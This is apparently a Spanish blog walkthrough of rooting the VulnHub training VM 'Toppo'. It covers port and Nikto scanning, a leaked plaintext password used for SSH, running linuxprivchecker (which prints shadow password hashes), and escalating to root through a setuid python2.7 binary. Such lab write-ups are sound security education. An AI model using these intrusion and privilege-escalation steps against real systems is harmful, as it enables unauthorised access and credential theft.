Siguiendo con mis artcículos sobre hackeo de VMs vulnerables hoy conseguiremos root en una máquina llamada Toppo, el proceso no es extremadamente complejo pero tiene su miga.
Nos bajamos la imagen de VBox de VulnHub o de alfaexploit:
https://www.vulnhub.com/entry/toppo-1,245/
Toppo.vmdk
Echamos un vistazo a los servicios ofrecidos:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-03 16:46 CEST
Nmap scan report for 192.168.20.103
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
56149/tcp open unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds
Lanzamos Nikto a ver que nos muestra:
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.20.103
+ Target Hostname: 192.168.20.103
+ Target Port: 80
+ Start Time: 2018-09-03 16:48:23 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time: 2018-09-03 16:48:32 (GMT2) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Accediendo mediante Firefox vemos que existe un fichero llamado notes.txt
Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .
Con un poco de suerte tenemos acceso:
ted@192.168.20.103's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
Nos bajamos linuxprivchecker:
wget
http://www.securitysift.com/download/linuxprivchecker.py
chmod 700 linuxprivchecker.py
python linuxprivchecker.py
[+] Shadow File (Privileged)
root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:17636:0:99999:7:::
ted:$6$P3kGAn0I$Yh0kqMyxQUd6wrBkWWZtlN30Xk4/UONrWecpA3D2o5OX12ZdWhdNt45KG0uiX3QlrcAgAFmoYHXbibaGEHkaK/:17777:0:99999:7:::
El script en python es capaz de dumpear el shadow sin permisos?
cat: /etc/shadow: Permission denied
Seguimos investigando:
lrwxrwxrwx 1 root root 9 Mar 16 2015 /usr/bin/python -> python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7
Ese setUID bueno, una vez mas vemos como unos permisos mal asignados pueden comprometer el sistema entero
Probamos a lanzar una shell desde el interprete de python:
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
cat: /etc/shadow: Permission denied
Intentemos una conexión reversa:
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)